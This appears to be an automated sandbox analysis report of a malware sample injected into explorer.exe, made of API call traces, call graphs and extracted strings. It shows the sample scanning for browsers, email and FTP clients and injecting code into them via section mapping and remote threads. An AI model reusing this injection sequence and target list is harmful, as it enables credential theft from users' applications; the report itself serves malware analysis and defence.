                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_1d1000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                        • Instruction ID: 40d4adad595331773e2bc96fd1c17638c7bb9a22ed4221692365951983957922
                                                                        • Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
                                                                        • Instruction Fuzzy Hash: 23D01224716A042BEF2CBBFE2C8D1747AD2E768212B588066B819C3352EE3DC895C341

                                                                        Execution Graph

                                                                        Execution Coverage:10.3%
                                                                        Dynamic/Decrypted Code Coverage:97.4%
                                                                        Signature Coverage:17.3%
                                                                        Total number of Nodes:306
                                                                        Total number of Limit Nodes:42
                                                                        execution_graph 708 3221000 709 3221010 708->709 710 3221007 708->710 712 3221016 710->712 762 3222608 VirtualQuery 712->762 715 3221097 715->709 717 322102c RtlMoveMemory 718 3221071 GetCurrentProcessId 717->718 719 322104d 717->719 723 3221092 718->723 724 322109e 718->724 799 3222861 GetProcessHeap RtlAllocateHeap 719->799 721 3221052 RtlMoveMemory 721->718 723->715 725 3221095 723->725 765 32210a4 724->765 800 3221332 725->800 727 32210a3 729 3222861 GetProcessHeap RtlAllocateHeap 727->729 730 32210cc 729->730 731 32210dc CreateToolhelp32Snapshot 730->731 732 3221322 Sleep 731->732 733 32210f0 Process32First 731->733 732->731 734 322131b CloseHandle 733->734 735 322110c lstrcmpiA 733->735 734->732 736 3221124 lstrcmpiA 735->736 759 3221280 735->759 737 3221138 lstrcmpiA 736->737 736->759 739 322114c lstrcmpiA 737->739 737->759 738 32225ad OpenProcess IsWow64Process IsWow64Process CloseHandle 738->759 740 3221160 lstrcmpiA 739->740 739->759 742 3221170 lstrcmpiA 740->742 740->759 741 3221305 Process32Next 741->735 743 3221319 741->743 744 3221184 lstrcmpiA 742->744 742->759 743->734 745 3221198 lstrcmpiA 744->745 744->759 746 32211ac lstrcmpiA 745->746 745->759 747 32211c0 lstrcmpiA 746->747 746->759 748 32211d4 lstrcmpiA 747->748 747->759 749 32211e8 lstrcmpiA 748->749 748->759 751 32211fc lstrcmpiA 749->751 749->759 750 3222608 VirtualQuery 750->759 752 322120c lstrcmpiA 751->752 751->759 754 322121c lstrcmpiA 752->754 752->759 753 32212ae lstrcmpiA 753->759 755 322122c lstrcmpiA 754->755 754->759 756 322123c lstrcmpiA 755->756 755->759 758 322124c lstrcmpiA 756->758 756->759 757 3221819 30 API calls 757->759 758->759 760 322125c lstrcmpiA 758->760 759->738 759->741 759->750 759->753 759->757 760->759 761 322126c lstrcmpiA 760->761 761->741 761->759 763 322101e 762->763 763->715 764 3222861 GetProcessHeap RtlAllocateHeap 763->764 764->717 827 3222861 GetProcessHeap RtlAllocateHeap 765->827 
767 32210cc 768 32210dc CreateToolhelp32Snapshot 767->768 769 3221322 Sleep 768->769 770 32210f0 Process32First 768->770 769->768 771 322131b CloseHandle 770->771 772 322110c lstrcmpiA 770->772 771->769 773 3221124 lstrcmpiA 772->773 782 3221280 772->782 774 3221138 lstrcmpiA 773->774 773->782 776 322114c lstrcmpiA 774->776 774->782 777 3221160 lstrcmpiA 776->777 776->782 779 3221170 lstrcmpiA 777->779 777->782 778 3221305 Process32Next 778->772 780 3221319 778->780 781 3221184 lstrcmpiA 779->781 779->782 780->771 781->782 783 3221198 lstrcmpiA 781->783 782->778 788 3222608 VirtualQuery 782->788 791 32212ae lstrcmpiA 782->791 828 32225ad OpenProcess 782->828 834 3221819 782->834 783->782 784 32211ac lstrcmpiA 783->784 784->782 785 32211c0 lstrcmpiA 784->785 785->782 786 32211d4 lstrcmpiA 785->786 786->782 787 32211e8 lstrcmpiA 786->787 787->782 789 32211fc lstrcmpiA 787->789 788->782 789->782 790 322120c lstrcmpiA 789->790 790->782 792 322121c lstrcmpiA 790->792 791->782 792->782 793 322122c lstrcmpiA 792->793 793->782 794 322123c lstrcmpiA 793->794 794->782 796 322124c lstrcmpiA 794->796 796->782 797 322125c lstrcmpiA 796->797 797->782 798 322126c lstrcmpiA 797->798 798->778 798->782 799->721 880 3222861 GetProcessHeap RtlAllocateHeap 800->880 802 3221340 GetModuleFileNameA 881 3222861 GetProcessHeap RtlAllocateHeap 802->881 804 3221357 GetCurrentProcessId wsprintfA 882 322263e CryptAcquireContextA 804->882 807 322139c Sleep 887 32224d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 807->887 808 322140d 905 3222843 808->905 812 32213ae GetModuleHandleA GetProcAddress 813 32213da GetModuleHandleA GetProcAddress 812->813 814 32213c9 812->814 817 3221406 813->817 818 32213f5 813->818 895 3221de3 814->895 815 3222843 3 API calls 819 322141b RtlExitUserThread 815->819 821 32224d5 10 API calls 817->821 820 3221de3 3 API calls 818->820 822 3221425 819->822 820->817 821->808 823 322144b 822->823 824 3222608 VirtualQuery 822->824 823->724 825 
322143a 824->825 825->823 910 3221493 825->910 827->767 829 3222600 828->829 830 32225cb IsWow64Process 828->830 829->782 831 32225ee 830->831 832 32225dc IsWow64Process 830->832 833 32225f9 CloseHandle 831->833 832->831 832->833 833->829 835 3222608 VirtualQuery 834->835 836 3221833 835->836 837 3221845 OpenProcess 836->837 838 3221a76 836->838 837->838 839 322185e 837->839 838->782 840 3222608 VirtualQuery 839->840 841 3221865 840->841 841->838 842 3221873 NtSetInformationProcess 841->842 843 322188f 841->843 842->843 865 3221a80 843->865 846 3221a80 2 API calls 847 32218d6 846->847 848 3221a73 CloseHandle 847->848 849 3221a80 2 API calls 847->849 848->838 850 3221900 849->850 871 3221b17 850->871 853 3221a80 2 API calls 854 3221930 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 853->854 855 3221985 854->855 856 3221a4e CreateRemoteThread 854->856 857 322198b CreateMutexA GetLastError 855->857 861 32219bb GetModuleHandleA GetProcAddress ReadProcessMemory 855->861 858 3221a65 CloseHandle 856->858 857->855 860 32219a7 CloseHandle Sleep 857->860 859 3221a67 CloseHandle CloseHandle 858->859 859->848 860->857 862 3221a47 861->862 863 32219ec WriteProcessMemory 861->863 862->858 862->859 863->862 864 3221a16 CreateRemoteThread CloseHandle Sleep WriteProcessMemory 863->864 864->862 866 3221a94 865->866 869 32218b4 865->869 867 3221aa4 NtCreateSection 866->867 868 3221ac3 866->868 867->868 868->869 870 3221ad8 NtMapViewOfSection 868->870 869->846 870->869 872 3221b60 871->872 873 3221b2e 871->873 875 3221b71 LoadLibraryA 872->875 878 3221bc3 872->878 879 3221ba1 GetProcAddress 872->879 874 3221b30 RtlMoveMemory 873->874 874->872 874->874 875->872 877 3221910 NtUnmapViewOfSection 875->877 876 3221be1 LdrProcessRelocationBlock 876->877 876->878 877->853 878->876 878->877 879->872 879->877 880->802 881->804 883 3222664 CryptCreateHash lstrlen CryptHashData CryptGetHashParam 882->883 884 3221384 CreateMutexA GetLastError 882->884 885 32226aa wsprintfA 883->885 884->807 
884->808 885->885 886 32226cc CryptDestroyHash CryptReleaseContext 885->886 886->884 888 3222515 887->888 889 3222565 CloseHandle 888->889 890 3222555 Thread32Next 888->890 891 3222521 OpenThread 888->891 889->812 890->888 892 3222544 ResumeThread 891->892 893 322253c SuspendThread 891->893 894 322254a CloseHandle 892->894 893->894 894->890 896 3221e56 895->896 897 3221ded 895->897 896->813 897->896 937 3221e93 VirtualProtect 897->937 899 3221e04 899->896 938 3222815 VirtualAlloc 899->938 901 3221e10 902 3221e1a RtlMoveMemory 901->902 903 3221e2d 901->903 902->903 939 3221e93 VirtualProtect 903->939 906 3222608 VirtualQuery 905->906 907 322284b 906->907 908 3221414 907->908 909 322284f GetProcessHeap HeapFree 907->909 908->815 909->908 911 32214c0 910->911 912 32214a1 910->912 914 3221510 911->914 915 32214c8 911->915 940 32217c7 912->940 959 32226e6 lstrlen lstrlen 914->959 917 32217c7 5 API calls 915->917 933 32214b6 915->933 919 32214e0 917->919 919->933 947 3221647 919->947 920 322155f 921 32226e6 2 API calls 920->921 923 322156c 921->923 926 32215a0 923->926 927 3221584 923->927 923->933 924 3221532 961 3221752 GetModuleHandleA GetProcAddress 924->961 932 3222404 5 API calls 926->932 926->933 964 3222404 lstrlen 927->964 930 3221647 11 API calls 930->933 934 32215ac 932->934 933->823 934->933 935 3221647 11 API calls 934->935 936 32214fb 935->936 936->933 970 32215e0 936->970 937->899 938->901 939->896 941 3221812 940->941 942 32217d1 940->942 941->933 942->941 943 32226e6 2 API calls 942->943 944 32217f1 943->944 944->941 975 3222861 GetProcessHeap RtlAllocateHeap 944->975 946 3221804 RtlMoveMemory 946->941 948 3221660 947->948 958 3221745 947->958 949 3221671 lstrlen 948->949 948->958 950 3221683 lstrlen 949->950 949->958 951 3221690 getpeername 950->951 950->958 952 32216ae inet_ntoa htons 951->952 951->958 953 32216cc 952->953 952->958 953->958 976 3222861 GetProcessHeap RtlAllocateHeap 953->976 955 3221717 wsprintfA 956 322173a 955->956 957 3222843 3 API 
calls 956->957 956->958 957->958 958->936 960 322151d 959->960 960->920 960->924 962 3221539 961->962 963 3221776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 961->963 962->930 962->933 963->962 965 3222456 964->965 966 322241c CryptStringToBinaryA 964->966 965->933 966->965 967 3222438 966->967 977 3222861 GetProcessHeap RtlAllocateHeap 967->977 969 3222444 CryptStringToBinaryA 969->965 971 3222843 3 API calls 970->971 972 32215f5 971->972 973 3222843 3 API calls 972->973 974 32215fc 973->974 974->933 975->946 976->955 977->969 987 3221eb6 988 3221ed9 987->988 989 3221ecc lstrlen 987->989 998 3222861 GetProcessHeap RtlAllocateHeap 988->998 989->988 991 3221ee1 lstrcat 992 3221f16 lstrcat 991->992 993 3221f1d 991->993 992->993 999 3221f4a 993->999 996 3222843 3 API calls 997 3221f40 996->997 998->991 1033 32222b8 999->1033 1003 3221f77 1038 32227e2 lstrlen MultiByteToWideChar 1003->1038 1005 3221f86 1039 3222374 RtlZeroMemory 1005->1039 1008 322229a 1010 3222843 3 API calls 1008->1010 1009 3221fd8 RtlZeroMemory 1011 322200d 1009->1011 1012 3221f2d 1010->1012 1011->1008 1013 322203b 1011->1013 1041 32222e5 1011->1041 1012->996 1016 3222280 1013->1016 1050 3222861 GetProcessHeap RtlAllocateHeap 1013->1050 1015 3222843 3 API calls 1015->1008 1016->1008 1016->1015 1018 322210b wsprintfW 1019 3222131 1018->1019 1023 322219e 1019->1023 1051 3222861 GetProcessHeap RtlAllocateHeap 1019->1051 1021 322216b wsprintfW 1021->1023 1022 322225d 1024 3222843 3 API calls 1022->1024 1023->1022 1052 3222861 GetProcessHeap RtlAllocateHeap 1023->1052 1026 3222271 1024->1026 1026->1016 1027 3222843 3 API calls 1026->1027 1027->1016 1028 3222256 1031 3222843 3 API calls 1028->1031 1029 32221e9 1029->1028 1053 3222815 VirtualAlloc 1029->1053 1031->1022 1032 3222243 RtlMoveMemory 1032->1028 1034 32222c2 1033->1034 1035 3221f69 1033->1035 1036 32226e6 2 API calls 1034->1036 1037 3222861 GetProcessHeap RtlAllocateHeap 1035->1037 1036->1035 1037->1003 1038->1005 1040 3221f96 
1039->1040 1040->1008 1040->1009 1042 32222f2 1041->1042 1044 3222353 1041->1044 1043 32222f6 DnsQuery_W 1042->1043 1042->1044 1045 3222335 DnsFree inet_ntoa 1042->1045 1043->1042 1044->1013 1045->1042 1046 3222355 1045->1046 1054 3222861 GetProcessHeap RtlAllocateHeap 1046->1054 1048 322235f 1055 32227e2 lstrlen MultiByteToWideChar 1048->1055 1050->1018 1051->1021 1052->1029 1053->1032 1054->1048 1055->1044 1056 3222806 VirtualFree 1057 3221425 1058 3221432 1057->1058 1059 322144b 1057->1059 1060 3222608 VirtualQuery 1058->1060 1061 322143a 1060->1061 1061->1059 1062 3221493 23 API calls 1061->1062 1062->1059 978 3227728 979 322774b 978->979 985 3227904 978->985 980 322785a LoadLibraryA 979->980 984 322789f VirtualProtect VirtualProtect 979->984 981 3227871 980->981 981->979 983 3227883 GetProcAddress 981->983 983->981 986 3227899 983->986 984->985 985->985 1069 322245e lstrlen 1070 3222476 CryptBinaryToStringA 1069->1070 1071 32224a5 1069->1071 1070->1071 1072 3222489 1070->1072 1075 3222861 GetProcessHeap RtlAllocateHeap 1072->1075 1074 3222494 CryptBinaryToStringA 1074->1071 1075->1074

                                                                        Callgraph

                                                                        callgraph 0 Function_032227E2 1 Function_03221DE3 21 Function_03221DC0 1->21 34 Function_03221E93 1->34 39 Function_03222815 1->39 43 Function_03221E5D 1->43 2 Function_032215E0 19 Function_03222843 2->19 3 Function_03222861 4 Function_032226E6 5 Function_032210A4 5->3 11 Function_032225AD 5->11 13 Function_03222573 5->13 14 Function_03222731 5->14 30 Function_03222608 5->30 31 Function_03222592 5->31 40 Function_03221819 5->40 6 Function_03221425 6->30 33 Function_03221493 6->33 7 Function_032222E5 7->0 7->3 8 Function_03227728 9 Function_03221469 9->30 9->33 10 Function_032224AE 12 Function_03221332 12->1 12->3 18 Function_0322263E 12->18 12->19 12->30 12->33 38 Function_032224D5 12->38 15 Function_03221EB6 15->3 15->19 29 Function_03221F4A 15->29 16 Function_03222374 17 Function_032222B8 17->4 19->30 20 Function_03221A80 41 Function_03221C19 21->41 22 Function_03221D80 22->41 23 Function_03221000 35 Function_03221016 23->35 24 Function_03222841 25 Function_03222806 26 Function_03221647 26->3 26->10 26->19 27 Function_032217C7 27->3 27->4 28 Function_03222404 28->3 29->0 29->3 29->7 29->14 29->16 29->17 29->19 29->39 32 Function_03221752 33->2 33->4 33->26 33->27 33->28 33->32 35->3 35->5 35->11 35->12 35->13 35->14 35->30 35->31 35->40 36 Function_03221B17 37 Function_03223417 40->20 40->30 40->36 42 Function_0322245E 42->3 43->22

                                                                        Control-flow Graph

                                                                        control_flow_graph 0 3221016-3221020 call 3222608 3 3221022-322104b call 3222861 RtlMoveMemory 0->3 4 3221097-3221098 0->4 7 3221071-3221090 GetCurrentProcessId 3->7 8 322104d-322106b call 3222861 RtlMoveMemory 3->8 12 3221092-3221093 7->12 13 322109e-32210d7 call 32210a4 call 3222861 7->13 8->7 12->4 14 3221095-3221099 call 3221332 12->14 22 32210dc-32210ea CreateToolhelp32Snapshot 13->22 14->13 23 3221322-322132d Sleep 22->23 24 32210f0-3221106 Process32First 22->24 23->22 25 322131b-322131c CloseHandle 24->25 26 322110c-322111e lstrcmpiA 24->26 25->23 27 3221280-3221289 call 32225ad 26->27 28 3221124-3221132 lstrcmpiA 26->28 34 3221305-3221313 Process32Next 27->34 35 322128b-3221294 call 3222592 27->35 28->27 29 3221138-3221146 lstrcmpiA 28->29 29->27 31 322114c-322115a lstrcmpiA 29->31 31->27 33 3221160-322116a lstrcmpiA 31->33 33->27 36 3221170-322117e lstrcmpiA 33->36 34->26 37 3221319 34->37 35->34 41 3221296-322129d call 3222573 35->41 36->27 40 3221184-3221192 lstrcmpiA 36->40 37->25 40->27 42 3221198-32211a6 lstrcmpiA 40->42 41->34 48 322129f-32212ac call 3222608 41->48 42->27 44 32211ac-32211ba lstrcmpiA 42->44 44->27 45 32211c0-32211ce lstrcmpiA 44->45 45->27 47 32211d4-32211e2 lstrcmpiA 45->47 47->27 49 32211e8-32211f6 lstrcmpiA 47->49 48->34 54 32212ae-3221300 lstrcmpiA call 3222731 call 3221819 call 3222731 48->54 49->27 51 32211fc-322120a lstrcmpiA 49->51 51->27 53 322120c-322121a lstrcmpiA 51->53 53->27 55 322121c-322122a lstrcmpiA 53->55 54->34 55->27 57 322122c-322123a lstrcmpiA 55->57 57->27 59 322123c-322124a lstrcmpiA 57->59 59->27 61 322124c-322125a lstrcmpiA 59->61 61->27 63 322125c-322126a lstrcmpiA 61->63 63->27 65 322126c-322127a lstrcmpiA 63->65 65->27 65->34
                                                                        APIs
                                                                          • Part of subcall function 03222608: VirtualQuery.KERNEL32(03224434,?,0000001C), ref: 03222615
                                                                          • Part of subcall function 03222861: GetProcessHeap.KERNEL32(00000008,0000A000,032210CC), ref: 03222864
                                                                          • Part of subcall function 03222861: RtlAllocateHeap.NTDLL(00000000), ref: 0322286B
                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 03221038
                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0322106B
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 03221074
                                                                        • GetCurrentProcessId.KERNEL32(?,03221010), ref: 0322107A
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 032210DF
                                                                        • Process32First.KERNEL32(00000000,?), ref: 032210FE
                                                                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0322111A
                                                                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0322112E
                                                                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 03221142
                                                                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 03221156
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03221166
                                                                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0322117A
                                                                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0322118E
                                                                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 032211A2
                                                                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 032211B6
                                                                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 032211CA
                                                                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 032211DE
                                                                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 032211F2
                                                                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 03221206
                                                                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 03221216
                                                                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 03221226
                                                                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 03221236
                                                                        • lstrcmpiA.KERNEL32(?,263em.exe), ref: 03221246
                                                                        • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 03221256
                                                                        • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 03221266
                                                                        • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 03221276
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 032212B4
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0322130B
                                                                        • CloseHandle.KERNELBASE(00000000), ref: 0322131C
                                                                        • Sleep.KERNELBASE(000003E8), ref: 03221327
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                        • String ID: 0-vP,v$263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                        • API String ID: 2555639992-2153411049
                                                                        • Opcode ID: 3c096b0c7815f787015b6cf02f51cbadf6cdd8357dc65268d356f1cf37601f21
                                                                        • Instruction ID: d489efdd236ecf16d7a15236356c9a04f9a1d23c6e0a7870b7ebabc88a446b57
                                                                        • Opcode Fuzzy Hash: 3c096b0c7815f787015b6cf02f51cbadf6cdd8357dc65268d356f1cf37601f21
                                                                        • Instruction Fuzzy Hash: 5471D835620336BBC710EB71AC48E6E7FACAF55680B4C4A29FE40C7045DB79F6858A74

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 03222861: GetProcessHeap.KERNEL32(00000008,0000A000,032210CC), ref: 03222864
                                                                          • Part of subcall function 03222861: RtlAllocateHeap.NTDLL(00000000), ref: 0322286B
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 032210DF
                                                                        • Process32First.KERNEL32(00000000,?), ref: 032210FE
                                                                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0322111A
                                                                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0322112E
                                                                        • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 03221142
                                                                        • lstrcmpiA.KERNEL32(?,opera.exe), ref: 03221156
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 03221166
                                                                        • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0322117A
                                                                        • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0322118E
                                                                        • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 032211A2
                                                                        • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 032211B6
                                                                        • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 032211CA
                                                                        • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 032211DE
                                                                        • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 032211F2
                                                                        • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 03221206
                                                                        • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 03221216
                                                                        • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 03221226
                                                                        • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 03221236
                                                                        • lstrcmpiA.KERNEL32(?,263em.exe), ref: 03221246
                                                                        • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 03221256
                                                                        • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 03221266
                                                                        • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 03221276
                                                                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 032212B4
                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0322130B
                                                                        • CloseHandle.KERNELBASE(00000000), ref: 0322131C
                                                                        • Sleep.KERNELBASE(000003E8), ref: 03221327
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                                        • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                        • API String ID: 3950187957-1680033604
                                                                        • Opcode ID: 06d1186c71119420c91f395902275101fc9e965ab004db3f9f072ed6a8b44f51
                                                                        • Instruction ID: 4f3110c111c48039931ded274ab514571a200c4b7fea20b428213849e020a33d
                                                                        • Opcode Fuzzy Hash: 06d1186c71119420c91f395902275101fc9e965ab004db3f9f072ed6a8b44f51
                                                                        • Instruction Fuzzy Hash: A251A735A24336BACB10EA719C44E6FBEEC6F45680B4C0A29FA40C3045DB79F5958AB5

                                                                        Control-flow Graph

                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003226000.00000040.80000000.00040000.00000000.sdmp, Offset: 03226000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3226000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2210da374603eb32f74879ff04510a3b74123c38595040e5d607f60cc3bed7a4
                                                                        • Instruction ID: 8fcf76e48d430e6d8191a2ec0aecbd6bc3aaf8a1519aa046403532a6e1914c44
                                                                        • Opcode Fuzzy Hash: 2210da374603eb32f74879ff04510a3b74123c38595040e5d607f60cc3bed7a4
                                                                        • Instruction Fuzzy Hash: B3512B7192C7A26FD721CA7CDC806B17FA4DB42220B1D06B9C9E5CB3C7E7A45885C761

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,0000A000,032210CC), ref: 03222864
                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0322286B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Heap$AllocateProcess
                                                                        • String ID:
                                                                        • API String ID: 1357844191-0
                                                                        • Opcode ID: 09d0ba32d4ab18af802edeb81147051f7013c5d8dd9ac664c1fbe0a66aa3fc31
                                                                        • Instruction ID: 32d6e249099b6fe673e021e90e7b0a1151774108144cfbad0d3beb5b370de456
                                                                        • Opcode Fuzzy Hash: 09d0ba32d4ab18af802edeb81147051f7013c5d8dd9ac664c1fbe0a66aa3fc31
                                                                        • Instruction Fuzzy Hash: 25A012744001007FDD50BBA0BC0DF453A19A750301F009000B389C4044996C014C8735

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 03222608: VirtualQuery.KERNEL32(03224434,?,0000001C), ref: 03222615
                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,7591E800,microsoftedgecp.exe,?), ref: 0322184E
                                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 03221889
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 03221919
                                                                        • RtlMoveMemory.NTDLL(00000000,03223428,00000016), ref: 03221940
                                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 03221968
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 03221978
                                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 03221992
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0322199A
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 032219A8
                                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 032219AF
                                                                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 032219C5
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 032219CC
                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 032219E2
                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 03221A0C
                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03221A1F
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03221A26
                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03221A2D
                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 03221A41
                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 03221A58
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03221A65
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03221A6B
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03221A71
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 03221A74
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.4535195693.0000000003221000.00000040.80000000.00040000.00000000.sdmp, Offset: 03221000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_3221000_explorer.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                        • String ID: 0-vP,v$atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                        • API String ID: 1066286714-2027951781
                                                                        • Opcode ID: 477d4533cf7284e1b1612701b59c05313ec24beb2aa5c5e602a34583b90b01d2
                                                                        • Instruction ID: 7c32bb1a24c4a7d57d3fba2054e7dfdf92979bf400c614ce80b30b80e3384751
                                                                        • Opcode Fuzzy Hash: 477d4533cf7284e1b1612701b59c05313ec24beb2aa5c5e602a34583b90b01d2
                                                                        • Instruction Fuzzy Hash: C961AE35204315BFD320EF25AC88E6BBFECEF58650F054618FA4992240D778EA44CBA2

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0322265A
                                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 03222672
                                                                        • lstrlen.KERNEL32(?,00000000), ref: 0322267A
